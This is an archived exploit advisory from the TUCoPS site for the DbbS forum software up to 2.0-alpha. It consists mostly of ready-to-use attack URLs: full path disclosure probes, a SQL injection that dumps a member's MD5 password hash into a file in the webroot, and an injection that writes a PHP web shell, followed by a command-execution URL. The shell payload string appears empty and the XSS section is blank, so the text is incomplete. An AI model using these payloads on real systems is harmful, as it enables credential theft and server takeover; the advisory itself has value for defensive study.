TUCoPS :: Web BBS :: etc :: b06-1660.htm

DbbS<=2.0-alpha Multiple Vulnerabilities
DbbS<=2.0-alpha Multiple Vulnerabilities
DbbS<=2.0-alpha Multiple Vulnerabilities


Special thanks to rgod for his help!!!

Full path disclosure

http://www.site.com/DbbS/topics.php?fcategoryid=' 
http://www.site.com/DbbS/script.php?unavariabile[]http://www.site.com/DbbS/script.php?GLOBALS[]http://www.site.com/DbbS/script.php?_SERVER[] 
MD5 Password

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\test.txt'%20FROM%20forum_membres%20WHERE%20id='1'/* 

Create shell

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,''%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\suntzu.php'%20FROM%20forum_categories/* 

Launch a command

http://www.site.com/DbbS/suntzu.php?cmd=dir 

XSS

 

 


by rgod and yamcho

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH